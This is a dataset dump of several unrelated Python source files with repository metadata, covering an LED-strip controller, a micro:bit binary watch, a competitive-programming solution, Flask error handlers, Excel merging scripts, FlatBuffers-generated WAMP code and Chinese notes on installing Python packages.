await self._send(b'roof' + struct.pack('BBBBB', _CMD_ALL_COLOR, r, g, b, w))
class Beam:
def __init__(self, ctrl, idx, n):
self._ctrl = ctrl
self._idx = idx
self._n = n
async def color(self, r, g, b, w=0):
await self._ctrl._send(b'roof' + struct.pack('BBBBBB', _CMD_STRIP_COLOR, self._idx, r, g, b, w))
async def pixel(self, buf):
# g r b w
await self._ctrl._send(b'roof' + struct.pack('BB', _CMD_STRIP_PIXEL, self._idx) + buf)
async def gradient(self, r, g, b, w=0):
buf = bytearray()
for i in range(self._n):
buf += bytes((i*g//self._n,i*r//self._n,i*b//self._n,i*w//self._n))
await self.pixel(buf)
async def rainbow(self, offset=0):
buf = bytearray()
for i in range(self._n):
r, g, b = rainbow.rainbow(offset + i * 2400 // self._n)
buf += bytes((g, r, b, 0))
await self.pixel(buf)
CONTROLLERS = [
Controller('192.168.1.165', 6454),
Controller('192.168.1.201', 6454),
Controller('192.168.1.192', 6454),
Controller('192.168.1.203', 6454),
]
BEAMS = [
Beam(CONTROLLERS[0], 0, 180),
Beam(CONTROLLERS[0], 1, 180),
Beam(CONTROLLERS[0], 2, 180),
Beam(CONTROLLERS[1], 0, 180),
Beam(CONTROLLERS[1], 1, 180),
Beam(CONTROLLERS[2], 0, 233),
Beam(CONTROLLERS[2], 1, 233),
Beam(CONTROLLERS[3], 0, 233),
Beam(CONTROLLERS[3], 1, 233),
]
class Frame:
def __init__(self, w, h):
self._buf = bytearray(w*h*4)
self._mv = memoryview(self._buf)
self._w = w
self._h = h
def clear(self):
for i in range(len(self._buf)):
self._buf[i] = 0
def fill(self, r, g, b, w=0):
for i in range(0, len(self._buf), 4):
self._buf[i] = g
self._buf[i+1] = r
self._buf[i+2] = b
self._buf[i+3] = w
def rect(self, x, y, w, h, r, g, b, ww=0):
for xx in range(x, x+w):
for yy in range(y, y+h):
p = yy*self._w*4+xx*4
self._buf[p] = g
self._buf[p+1] = r
self._buf[p+2] = b
self._buf[p+3] = ww
async def write(self):
for i, s in enumerate(BEAMS):
await s.pixel(self._mv[i*self._w*4:i*self._w*4+s._n*4])
for c in CONTROLLERS:
await c.flush()
def pixel(self, x, y, r, g, b, w=0):
p = y * self._w * 4 + x * 4
self._buf[p] = g
self._buf[p+1] = r
self._buf[p+2] = b
self._buf[p+3] = w
async def flush():
for c in CONTROLLERS:
await c.flush()
async def color(r,g,b,w=0):
for c in CONTROLLERS:
await c.color(r,g,b,w)
await flush()
async def flash(r,g,b,w=0):
await color(r,g,b,w)
await color(0,0,0,0)
async def main():
if len(sys.argv) < 2:
return
if sys.argv[1] == 'color':
await color(*(int(x) for x in sys.argv[2:]))
elif sys.argv[1] == 'rainbow':
f = Frame(233, 9)
i = 0
while True:
fx = 1+(1*math.cos(i/91)*math.cos(i/79))
fy = 1+(1*math.sin(i/83)*math.sin(i/101))
tt = i / 10
for y in range(9):
for x in range(233):
xx = x / 233
yy = y / 9
p1 = int(1200 * (math.sin(fy*math.pi*yy)+math.cos(fx*math.pi*xx) + 1))
r,g,b = rainbow.rainbow(p1+i)
f.pixel(x, y, r,g,b,0)
await f.write()
i += 0.1
if __name__ == '__main__':
asyncio.run(main())
| [
"jim.mussared@gmail.com"
] | jim.mussared@gmail.com |
4a54043047808d15f7bbd51f8331c719f8bd6527 | c7f732e6d7fff86bb99cf85c0814c1a76c5f16c4 | /main.py | fd862c3423503bd3843404a2172356643276eb00 | [] | no_license | Starmancer/watch | 57653644ea69f2f6d84ce4fecb5cd86ea380391b | 81c18726641ff06848fc73f6369d44aba2bd45ea | refs/heads/master | 2023-02-14T17:44:40.980712 | 2021-01-10T21:26:08 | 2021-01-10T21:26:08 | 328,482,636 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,674 | py | #About
#'Bit:watch' is a Binary Watch programme written in MicroPython for the BBC Micro:bit by @petejbell and distributed under a MIT licence
#Please share with me what you do with it, I'd love to see what you do!
#You can find a tutorial showing you how to build a strap for your watch here: https://t.co/li9CktVJhg
#Instructions
#1) Download Mu from here: https://github.com/ntoll/mu
#2) Copy and paste this BitWatch code to Mu, connect your Micro:bit to your computer and then flash the code to your Micro:bit
#3) The BitWatch will display 18:50 as the time for 10 seconds and will then show '18:51'.
# Use Button A to set the Hours and B to set the Minutes. Press each one and you will see the hours/minutes increment on the Micro:bit and the Repl console.
# Use Buttons A+B together to reset seconds to '0'.
#
# Column 0 shows the first digit in the hours (in 24hr clock)
# Column 1 shows the second digit.
# Column 2 shows the seconds flashing away.
# Column 3 shows the first digit in the minutes
# Column 4 shows the second digit.
#For a crash course on binary, see here: http://www.bbc.co.uk/education/guides/z26rcdm/revision/2
#Sets up microbit
from microbit import *
#Sets time variables
hrs = 18
mins = 50
sec = 50
hours = []
minutes = []
seconds = []
#Sets brightness of time digits
b = 9
#defines functions to display time digits
def one(x):
zero(x)
display.set_pixel(x, 3, b),
def two(x):
zero(x)
display.set_pixel(x, 2, b),
def three(x):
zero(x)
display.set_pixel(x, 3, b)
display.set_pixel(x, 2, b),
def four(x):
zero(x)
display.set_pixel(x, 1, b),
def five(x):
zero(x)
display.set_pixel(x, 3, b)
display.set_pixel(x, 1, b),
def six(x):
zero(x)
display.set_pixel(x, 2, b)
display.set_pixel(x, 1, b),
def seven(x):
zero(x)
display.set_pixel(x, 1, b)
display.set_pixel(x, 2, b)
display.set_pixel(x, 3, b),
def eight(x):
zero(x)
display.set_pixel(x, 0, b),
def nine(x):
zero(x)
display.set_pixel(x, 0, b)
display.set_pixel(x, 3, b),
def zero(x):
for i in range(0,4):
display.set_pixel(x, i, 0)
#function to create ticking seconds
def fadesecs(x):
display.set_pixel(2, 2, x)
display.set_pixel(2, 1, x)
#functions to create a background to show the binary display 'area' (There must be a more efficient way of doing this! Tweet me @petejbell if you can help!)
def background(x,y):
if display.get_pixel(x, y) < 1: #checks if each pixel is turned off
display.set_pixel(x, y, 1) #if so, sets the pixel to a value of 1
def backgrounds():
for i in range(4): #misses the flashing seconds column (2) and the last row
background(0, i)
background(1, i)
background(3, i)
background(4, i)
#function to print the time to Repl in MU f(or testing/debugging)
def printtime():
print(str(hours)+":"+str(minutes)+":"+str(seconds))
#a list of binaries to be used by the function 'displaybinaries' (below)
binaries = [one, two, three, four, five, six, seven, eight, nine, zero]
#function to show the time in binary using the time digits and binaries functions; with the list of functions ('binaries' above)
def displaybinaries():
global mins #each variable must be defined as 'global' (otherwise the function thinks they are defined 'locally', within itself)
global hrs
global minutes
global hours
if mins<10:
binaries[mins-1](4) #sets column 4 to digit from minutes (if mins between 0 and 9)
zero(3) #clears column 3
backgrounds() #calls the backgrounds to (dimly) light 'off' pixels
elif mins > 9:
minutes = [int(i) for i in str(mins)] #creates a list of two digits from the string of mins
binaries[minutes[0]-1](3) #calls the binaries function to display the first digit
binaries[minutes[1]-1](4) #calls the binaries function to display the second digit
backgrounds()
if hrs<10:
binaries[hrs-1](1)
zero(0)
backgrounds()
elif hrs > 9:
hours = [int(i) for i in str(hrs)]
binaries[hours[0]-1](0)
binaries[hours[1]-1](1)
backgrounds()
#function to check if buttons pressed and increment mins/secs accordingly
def sleepbutton(x):
global sec
global hrs
global mins
if button_a.was_pressed():
if hrs < 24:
hrs += 1
else:
hrs = 0
displaybinaries()
print(hrs)
if button_b.was_pressed():
if mins < 60:
mins += 1
sec = 0
else:
mins = 0
sec = 0
displaybinaries()
print(mins)
#if button_a.is_pressed() and button_b.is_pressed(): # This doesn't work. I don't know why :(
# if sec < 60:
# sec = 1
# displaybinaries()
sleep(x)
while True:
for i in range(0,5): #iterates 5 times (x 100 = 500)... but....
sleepbutton(99) #The code runs a little slow/fast. Play with this number to get it accurate!
fadesecs(1) #calls function to 'flash' seconds
for i in range(0,5): #iterates 5 times again
sleepbutton(98) #see above
fadesecs(4) #calls function to 'flash' seconds
sec += 1
if sec % 60 == 0: #this section increments time
mins += 1
if mins % 60 == 0:
hrs += 1
mins = 0
if hrs % 24 == 0:
hrs = 0
seconds=str(sec)
minutes=str(mins)
hours=str(hrs)
printtime()
displaybinaries() | [
"ewarfare@me.com"
] | ewarfare@me.com |
6fdea119f9c9239b63eda3db6b7c2b1d0233e66d | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02585/s776126936.py | 78cc9d2cac5fd2a3bfb611ed540139e54d721039 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,175 | py | import sys
sys.setrecursionlimit(10**7)
readline = sys.stdin.buffer.readline
def readstr():return readline().rstrip().decode()
def readstrs():return list(readline().decode().split())
def readint():return int(readline())
def readints():return list(map(int,readline().split()))
def printrows(x):print('\n'.join(map(str,x)))
def printline(x):print(' '.join(map(str,x)))
def check(cir,num):
m = len(cir)
a = sum(cir)
if num == 0:
ss = 0
elif num == 1:
ss = max(cir)
else:
ac = list(accumulate([0]+cir))
l = 0
r = 1
ss = ac[r]-ac[l]
i = 0
while 1:
if r == m:
l = ac[l+1:r].index(min(ac[l+1:r])) + l+1
ss = max(ss,ac[r]-ac[l])
break
elif i%2==0:
r = ac[r+1:l+num+1].index(max(ac[r+1:l+num+1])) + r+1
else:
l = ac[l+1:r].index(min(ac[l+1:r])) + l+1
i+=1
ss = max(ss,ac[r]-ac[l])
num = m-num
l = 0
r = num
i = 0
ss = max(ss,a-ac[r]+ac[l])
while 1:
if r == m:
l = ac[l+1:r-num+1].index(max(ac[l+1:r-num+1])) + l+1
ss = max(ss,a-ac[r]+ac[l])
break
elif i%2==0:
r = ac[r+1:l+m].index(min(ac[r+1:l+m])) + r+1
else:
l = ac[l+1:r-num+1].index(max(ac[l+1:r-num+1])) + l+1
i+=1
ss = max(ss,a-ac[r]+ac[l])
return ss
from itertools import accumulate
n,k = readints()
p = [x-1 for x in readints()]
c = readints()
circles = []
used = [0]*n
for i in range(n):
if not used[i]:
circles.append([c[i]])
used[i] = 1
j = p[i]
while not used[j]:
circles[-1].append(c[j])
used[j] = 1
j = p[j]
score = -10**20
for cir in circles:
m = len(cir)
a = sum(cir)
if k>m:
if a>0:
score = max(score, (k//m)*a + check(cir,k%m), (k//m-1)*a + check(cir,m))
else:
score = max(score,check(cir,m))
else:
score = max(score,check(cir,k))
print(score)
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
0a66b8c303841840febd5901cb4c69c8ed029eba | 1b4cbdbb58e4b6ade98d9b407a578d406f22e693 | /demotest/__init__.py | b15b340091d0b4f3724839dea770b349ba87a85a | [] | no_license | kevin-di-10/QT4CDemoProj | f6b9568c886702a214e99ede32c71acb93c3e1e5 | 242188e066bd2bd23eff4c6b24b0b689d85d01a7 | refs/heads/master | 2022-04-09T01:37:01.064814 | 2020-02-20T08:29:42 | 2020-02-20T08:29:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 73 | py | # -*- coding: utf-8 -*-
'''测试用例
'''
#2018/12/17 QTAF自动生成
| [
"774517491@qq.com"
] | 774517491@qq.com |
f8f954cdca6e653c7cc7345e2ba1983dae0767be | e7aa8615cd2a09d64a7fdc93bf10fc74b5a0f726 | /note/spider_nba_note.py | 6ca2ced88a8c5fc3c2af33c87ba48db1211829c4 | [] | no_license | zonyeeLu/zonyee_dwh | 18c908ed7dab4039acfb48e93df74a449eb680b0 | dc7a8fe92a5d300550a6a69a5f4249a73f51c493 | refs/heads/master | 2022-02-08T13:33:33.048986 | 2022-01-08T15:04:54 | 2022-01-08T15:04:54 | 196,799,447 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,252 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# ******************************************************************************
# 程序名称: spider_nba_note.py
# 功能描述: 将数据写入hdfs 笔记
# 输入参数: 无
# 创建人名: zonyee_lu
# 创建日期: 20190715
# ******************************************************************************
# ******************************************************************************
# 在服务器中安装BeautifulSoup步骤
# 下载地址:http://www.crummy.com/software/BeautifulSoup/download/4.x/
# 推荐下载BeautifulSoup-4.2.1.tar.gz
# 解压缩:tar xvzf BeautifulSoup-4.2.1.tar.gz
# 进入beautifulsoup4-4.2.1文件
# 命令:python setup.py install
# 测试是否安装成功
# 输入python,
# >>from bs4 import BeautifulSoup
# 没有报告错误,安装成功
# python3 安装 BeautifulSoup
# https://jingyan.baidu.com/article/ac6a9a5e31c87c2b643eac11.html
# 安装bs4遇到的问题:
# You are trying to run the Python 2 version of Beautiful Soup under Python 3
# 解决方案:
# 解决办法:直接将压缩文件中的bs4复制到python安装目录下的lib中,然后再利用python自带工具2to3.py将版本2下的.py 文件转化为版本3下的文件
# 具体:将bs4文件夹和2to3.py同时放到lib中,然后在cmd中定位到lib,运行:2to3 -w bs4就好了,最后需要将lib/bs4 覆盖/usr/local/Python3/lib/python3.6/site-packages之前的bs4
# 2to3 位置: /usr/local/Python3/bin
# 服务器中安装pip步骤
# https://pypi.python.org/pypi/pip
# 下载之后的包上传到服务器上
# 然后解压 tar -zxvf ***
# 解压之后会有个文件夹
# 进入到文件夹,执行命令python setup.py install
# 安装完之后执行 pip -V 如果能看到版本号,代表安装成功
# 如果报错-bash: pip: command not found
# 那么可以看一下是不是没有把python加入到环境变量中,如果没有添加一下,修改/etc/profile文件
# export PATH="$PATH:/usr/local/python/bin" python 的路径一定要正确
# source /etc/profile
# 然后重新打开一个会话,执行pip -V 就可以看到了
# ok,安装成功了
# 安装pyhive 包
# pip install sasl
# pip install thrift
# pip install thrift-sasl
# pip install PyHive | [
"xianbing"
] | xianbing |
6d56c14dcbba73bbc80284c74d32c7efe6a0d6e2 | 04f599eec632155a2c7d0679967a8b82ce5f0faa | /Chapter5Ex.py | 7c9f4f4f06933b7670091e237d1988a47a84003c | [] | no_license | ssharp96/Comp-Sci-350 | 7f4f6f77e3087883593cc269da8698e94b57f30d | 5615412280d315fad06aa5e67532458dc0df6f54 | refs/heads/master | 2016-09-06T15:48:51.757522 | 2014-03-19T22:15:33 | 2014-03-19T22:15:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 545 | py | # Chapter 5 Exercises
# author: SSharp
#Problem 1
x = int(input("Pick a number between 0 and 6, inclusive: "))
if (x == 0):
print("The day with value",x,"is Sunday.")
elif (x == 1):
print("The day with value",x,"is Monday.")
elif (x == 2):
print("The day with value",x,"is Tuesday.")
elif (x == 3):
print("The day with value",x,"is Wednesday.")
elif (x == 4):
print("The day with value",x,"is Thrusday.")
elif (x == 5):
print("The day with value",x,"is Friday.")
else:
print("The day with value",x,"is Saturday.")
| [
"simonsharp96@gmail.com"
] | simonsharp96@gmail.com |
6d08dfaad6bb9fec95d57b70fa180577ae63423c | 5783336b9b40b0999b2a39104d0135b2b85f3c17 | /Scripts/PlantSEED_v3/Curation/krbeilsmith/update_publications.py | 7ca49afbcdfb402800ae87480bc3d201de44dbc9 | [] | no_license | ModelSEED/PlantSEED | 3fb0d82c15c108dd885047409d9a09207896fa5c | 8cf60046e4af68912f7a7d3eeff16880a07f56bd | refs/heads/master | 2022-08-30T23:49:02.140280 | 2021-08-30T16:09:39 | 2021-08-30T16:09:39 | 38,062,831 | 5 | 9 | null | 2022-04-01T19:53:20 | 2015-06-25T17:11:58 | Perl | UTF-8 | Python | false | false | 1,200 | py | #!/usr/bin/env python
import os,sys,json
if(len(sys.argv)<2 or os.path.isfile(sys.argv[1]) is False):
print("Takes one argument, the path to and including roles file")
sys.exit()
updates_list=list()
with open(sys.argv[1]) as updates_file:
for line in updates_file.readlines():
line=line.strip('\r\n')
array = line.split('\t')
updates_dict=dict()
for entry in array:
(key,value) = entry.split(':', maxsplit=1)
updates_dict[key]=value
updates_list.append(updates_dict)
with open("../../../../Data/PlantSEED_v3/PlantSEED_Roles.json") as subsystem_file:
roles_list = json.load(subsystem_file)
for update in updates_list:
for entry in roles_list:
if(update['feature'] in entry['features']):
print("Updating: ",update['feature'])
for publication in update['publications'].split('|'):
if(publication not in entry['publications']):
entry['publications'].append(publication)
with open('../../../../Data/PlantSEED_v3/PlantSEED_Roles.json','w') as new_subsystem_file:
json.dump(roles_list,new_subsystem_file,indent=4)
| [
"samseaver@gmail.com"
] | samseaver@gmail.com |
a61845d3d55e2143d1405a204b2915ac38643a23 | 4ddc37c1db4112478c96f86768cfd9c7616c8105 | /app/error/views.py | 8b9e6ec49ceec154b1bb2b14c4f27d4abf99d305 | [] | no_license | NeoWzk/flaskblog | 63506c8e44c0e27977d86e2e2b4c9513219bacf1 | 1fb19dded74f4715171a9339666b36add6efedcd | refs/heads/master | 2020-04-23T07:25:39.595366 | 2019-02-26T03:05:43 | 2019-02-26T03:05:43 | 170,990,299 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 393 | py | from flask import render_template, url_for, redirect, flash
from . import error
@error.app_errorhandler(404)
def page_not_found(e):
return render_template('errors/404.html')
@error.app_errorhandler(500)
def internal_server_error(e):
return render_template('errors/500.html')
@error.app_errorhandler(401)
def unauthorized(e):
return render_template('errors/unauthorized.html') | [
"2585414795@qq.com"
] | 2585414795@qq.com |
f41b5ad4bb00f7a7e6cfd9467186de6134f392fa | 6fd69948915b152d02fb057737b52946bc4135c7 | /model/RuleModel.py | c727a3f651d5b00ef228a6c8f5f40b9e683ebbce | [] | no_license | Kimxiaogen/TrustTest | 2c6b52bb0e5788287e57fa6a69e993f3d25a1674 | 771440bbf33a510df78f8c6250487f94910739da | refs/heads/master | 2023-01-09T08:19:16.328029 | 2020-11-04T07:41:01 | 2020-11-04T07:41:45 | 309,928,584 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,080 | py | from model.RoleModel import Role, Role_A, Role_B, Role_C, Role_D, Role_E
import random as rd
import copy
import writeToCSV
def getSort(role): # 返回排序字段sort #
return role.sort
def getCoins(role): # 返回排序字段coins #
return role.coins
class Rule: # 定义游戏规则 #
def __init__(self, reward, players_num, epoch, max_turns, replace, mistake_rate, sign):
self.reward = reward # 报酬收益表,2*2数组,数组内容为长度为2的一维数组 #
self.players_num = players_num # 5种玩家组成,长度为5的一维数组 #
self.epoch = epoch # 每一局进行比赛轮数 #
self.max_turns = max_turns # 最大局数 #
self.replace = replace # 每一局比赛结束后,淘汰replace个最低分玩家,引入replace个最高分玩家 #
self.mistake_rate = mistake_rate # 错误率,范围在0至1之间 #
self.roles = [] # 参与的角色集合 #
self.total_num = sum(players_num) # 参与总人数 #
self.data = [] # 输出数据 #
self.sign = sign
def compute(self, choice_a, choice_b): # 计算决策结果 #
reward_array = self.reward[choice_a][choice_b] # 得到奖励数组 #
coin_a = reward_array[0]
coin_b = reward_array[1]
return coin_a, coin_b
def play(self, a, b): # 角色a与角色b进行一轮游戏 #
choose_a = self.mistake(a.choose())
choose_b = self.mistake(b.choose())
coin_a, coin_b = self.compute(choose_a, choose_b)
a.feedback(choose_b, coin_a)
b.feedback(choose_a, coin_b)
def playForNum(self, a, b, num): # 角色a与角色b进行N轮游戏 #
for i in range(num):
self.play(a, b)
def mistake(self, choice): # 按照错误率,随机改变角色选择 #
rand = rd.random()
if rand < self.mistake_rate: # 发生错误时,改变choice #
choice = 1 if choice == 0 else 0
return choice
def show(self): # 打印角色情况 #
print("角色A\t角色B\t角色C\t角色D\t角色E\n")
arr = []
for num in self.players_num:
arr.append(num)
print(str(num) + "\t\t", end='')
print()
self.data.append(arr)
def updatePlayersNum(self): # 更新角色数量 #
self.players_num = [0, 0, 0, 0, 0]
for r in self.roles:
self.players_num[r.sort - 1] += 1
def addPlayers(self): # 构造参与玩家 #
coins = 0 # 初始硬币数 #
for n in range(self.players_num[0]):
r = Role_A(coins)
self.roles.append(r)
for n in range(self.players_num[1]):
r = Role_B(coins)
self.roles.append(r)
for n in range(self.players_num[2]):
r = Role_C(coins)
self.roles.append(r)
for n in range(self.players_num[3]):
r = Role_D(coins)
self.roles.append(r)
for n in range(self.players_num[4]):
r = Role_E(coins)
self.roles.append(r)
def initPlayers(self): # 重置所有玩家 #
for r in self.roles:
r.clean()
self.roles.sort(key=getSort) # 排序 #
def replaceFailers(self): # 用最高分玩家替换最低分玩家 #
self.roles.sort(key=getCoins) # 按照硬币数排序 #
winner = self.roles[self.total_num - 1] # 找到硬币最多的玩家 #
loser = self.roles[0].coins # 最低分 #
# 移除5名最低分玩家(若有多余5名最低分玩家,随机挑选5位移除) #
if loser == self.roles[self.replace - 1].coins: # 多余5位 #
remove_list = []
for i in range(len(self.roles)):
if loser == self.roles[i].coins:
remove_list.append(i)
max = len(remove_list)
for n in range(self.replace):
rand = rd.randrange(0, max, 1)
self.roles[remove_list[rand]] = copy.deepcopy(winner)
else: # 少于或等于5位 #
for r in range(self.replace):
self.roles[r] = copy.deepcopy(winner)
def start(self): # 游戏开始 #
self.addPlayers()
path = './result/mistake_rate_' + str(self.mistake_rate) + '_' + str(self.sign) + '.csv'
for m in range(self.max_turns): # 每一局,每个玩家与其他所有玩家都要进行比赛 #
self.initPlayers()
self.show()
for gap in range(1, self.total_num): # 每个玩家之间进行epoch轮比赛 #
index = 0
curr = self.total_num - gap
while index + curr < self.total_num:
a = self.roles[index]
b = self.roles[index + curr]
self.playForNum(a, b, self.epoch)
index += 1
a.reset()
b.reset()
self.replaceFailers()
self.updatePlayersNum()
writeToCSV.writecsvByName(self.data, path)
| [
"1147209611@qq.com"
] | 1147209611@qq.com |
5f6f17cb23c11eed1498eb099c9451bbd805d7e7 | 29486eba7c582dfeaef4a10da4c82b5ab6e778c0 | /autobahn/wamp/gen/wamp/proto/Unsubscribed.py | 3fafde8d6377be3c947c2118e39603478058e433 | [
"MIT"
] | permissive | oberstet/autobahn-python | 4947396741edfe7fc17ecae6a334418a0315bc2c | 359f868f9db410586cf01c071220994d8d7f165a | refs/heads/master | 2023-06-23T01:21:19.487304 | 2023-06-14T07:25:55 | 2023-06-14T07:25:55 | 128,950,670 | 0 | 0 | MIT | 2018-04-10T14:57:55 | 2018-04-10T14:57:55 | null | UTF-8 | Python | false | false | 2,690 | py | # automatically generated by the FlatBuffers compiler, do not modify
# namespace: proto
import flatbuffers
from flatbuffers.compat import import_numpy
np = import_numpy()
class Unsubscribed(object):
__slots__ = ['_tab']
@classmethod
def GetRootAs(cls, buf, offset=0):
n = flatbuffers.encode.Get(flatbuffers.packer.uoffset, buf, offset)
x = Unsubscribed()
x.Init(buf, n + offset)
return x
@classmethod
def GetRootAsUnsubscribed(cls, buf, offset=0):
"""This method is deprecated. Please switch to GetRootAs."""
return cls.GetRootAs(buf, offset)
# Unsubscribed
def Init(self, buf, pos):
self._tab = flatbuffers.table.Table(buf, pos)
# Unsubscribed
def Session(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(4))
if o != 0:
return self._tab.Get(flatbuffers.number_types.Uint64Flags, o + self._tab.Pos)
return 0
# Unsubscribed
def Request(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6))
if o != 0:
return self._tab.Get(flatbuffers.number_types.Uint64Flags, o + self._tab.Pos)
return 0
# Unsubscribed
def Subscription(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(8))
if o != 0:
return self._tab.Get(flatbuffers.number_types.Uint64Flags, o + self._tab.Pos)
return 0
# Unsubscribed
def Reason(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(10))
if o != 0:
return self._tab.String(o + self._tab.Pos)
return None
def UnsubscribedStart(builder): builder.StartObject(4)
def Start(builder):
return UnsubscribedStart(builder)
def UnsubscribedAddSession(builder, session): builder.PrependUint64Slot(0, session, 0)
def AddSession(builder, session):
return UnsubscribedAddSession(builder, session)
def UnsubscribedAddRequest(builder, request): builder.PrependUint64Slot(1, request, 0)
def AddRequest(builder, request):
return UnsubscribedAddRequest(builder, request)
def UnsubscribedAddSubscription(builder, subscription): builder.PrependUint64Slot(2, subscription, 0)
def AddSubscription(builder, subscription):
return UnsubscribedAddSubscription(builder, subscription)
def UnsubscribedAddReason(builder, reason): builder.PrependUOffsetTRelativeSlot(3, flatbuffers.number_types.UOffsetTFlags.py_type(reason), 0)
def AddReason(builder, reason):
return UnsubscribedAddReason(builder, reason)
def UnsubscribedEnd(builder): return builder.EndObject()
def End(builder):
return UnsubscribedEnd(builder) | [
"noreply@github.com"
] | oberstet.noreply@github.com |
0ab4c7e45a076fdca44460ebcd19c329f4908220 | 635859dae21148fd6d9a4f0a1e601a3807c733a7 | /lirun.py | 9b2bd5b2041613a75a964a3a940281bb1295962d | [] | no_license | butter007/py | 14588849550b640b9496301e6da104116e36f1f5 | 2402b357eac5ec50a64db5e2d9ed37795ef71aea | refs/heads/master | 2021-06-30T19:31:21.167332 | 2020-08-26T13:15:18 | 2020-08-26T13:15:18 | 122,844,782 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,608 | py | # -*- coding: utf-8 -*-
from pyExcelerator import *
import datetime
import sys
import xlrd
import pickle
from xlutils.copy import copy
reload(sys)
sys.setdefaultencoding('utf-8')
eledata600211 = xlrd.open_workbook("D:\py\\600211.xlsx")
eletable600211 = eledata600211.sheets()[0]
nrows600211 = eletable600211.nrows
eledata660111 = xlrd.open_workbook("D:\py\\660111.xlsx")
eletable660111 = eledata660111.sheets()[0]
nrows660111 = eletable660111.nrows
eledata660311 = xlrd.open_workbook("D:\py\\660311.xlsx")
eletable660311 = eledata660311.sheets()[0]
nrows660311 = eletable660311.nrows
data6002 = xlrd.open_workbook("D:\py\\6002all.xlsx")
table6002 = data6002.sheets()[0]
nrows6002 = table6002.nrows
excel6002 = copy(data6002)
sheet6002 = excel6002.get_sheet(0)
row6002 = nrows6002
for i in xrange(1, nrows600211):
for j, data in enumerate(eletable600211.row_values(i)):
sheet6002.write(row6002 + i - 1, j, data)
excel6002.save('new6002all.xls')
data6601 = xlrd.open_workbook("D:\py\\6601all.xlsx")
table6601 = data6601.sheets()[0]
nrows6601 = table6601.nrows
excel6601 = copy(data6601)
sheet6601 = excel6601.get_sheet(0)
row6601 = nrows6601
for i in xrange(1, nrows660111):
for j, data in enumerate(eletable660111.row_values(i)):
sheet6601.write(row6601 + i - 1, j, data)
excel6601.save('new6601all.xls')
data6603 = xlrd.open_workbook("D:\py\\6603all.xlsx")
table6603 = data6603.sheets()[0]
nrows6603 = table6603.nrows
excel6603 = copy(data6603)
sheet6603 = excel6603.get_sheet(0)
row6603 = nrows6603
for i in xrange(1, nrows660311):
for j, data in enumerate(eletable660311.row_values(i)):
sheet6603.write(row6603 + i - 1, j, data)
excel6603.save('new6603all.xls')
'''
alldata6601 = xlrd.open_workbook("D:\py\\6601all.xlsx")
alltable6601 = alldata6601.sheets()[0]
allnrows6601 = alltable6601.nrows
col6601 = alltable6601.col_values(7)
new_col6601 = set(col6601)
alldata6603 = xlrd.open_workbook("D:\py\\6603all.xls")
alltable6603 = alldata6603.sheets()[0]
allnrows6603 = alltable6603.nrows
col6603 = alltable6603.col_values(6)
new_col6603 = set(col6603)
'''
alldata6002 = xlrd.open_workbook("D:\py\\new6002all.xls")
alltable6002 = alldata6002.sheets()[0]
allnrows6002 = alltable6002.nrows
col6002 = alltable6002.col_values(6)
new_col6002 = set(col6002)
alldata6601 = xlrd.open_workbook("D:\py\\new6601all.xls")
alltable6601 = alldata6601.sheets()[0]
allnrows6601 = alltable6601.nrows
col6601 = alltable6601.col_values(7)
new_col6601 = set(col6601)
alldata6603 = xlrd.open_workbook("D:\py\\new6603all.xls")
alltable6603 = alldata6603.sheets()[0]
allnrows6603 = alltable6603.nrows
col6603 = alltable6603.col_values(6)
new_col6603 = set(col6603)
allyunbian = new_col6002 | new_col6601 | new_col6603
print len(allyunbian)
adic = {}
for data in allyunbian:
for j in range(1, allnrows6002):
row = alltable6002.row_values(j)
if data == row[6]:
adic.setdefault(data, {}).setdefault(6002, []).append(j)
for data in allyunbian:
for j in range(1, allnrows6601):
row = alltable6601.row_values(j)
if data == row[7]:
adic.setdefault(data, {}).setdefault(6601, []).append(j)
for data in allyunbian:
for j in range(1, allnrows6603):
row = alltable6603.row_values(j)
if data == row[6]:
adic.setdefault(data, {}).setdefault(6603, []).append(j)
output = open('data.pkl', 'wb')
pickle.dump(adic, output)
output.close()
'''
excle_Workbook = Workbook()
excel_sheet_name = datetime.datetime.now().strftime('%Y-%m-%d')
excel_sheet = excle_Workbook.add_sheet(excel_sheet_name)
'''
| [
"butter_007@163.com"
] | butter_007@163.com |
e99b1b904a183481565ed38808f38f03702f4e60 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2739/60825/244336.py | 391935b7e27570792c33d23a3858845f5b95b823 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 440 | py | res=[]
def printAns(currList, currSum, target, k):
if(currSum==target&&currList.size()==k):
res.append(currList)
return
elif currSum>target||currList.size()>k:
return
else:
for i in range(currList[len(currList)-1], 9):
t=currList[:]
t.append(i)
printAns(t, currSum+i, target, k)
s=input()
k=int(s[0])
target=int(s[3:])
printAns([], 0, target, k)
print(res) | [
"1069583789@qq.com"
] | 1069583789@qq.com |
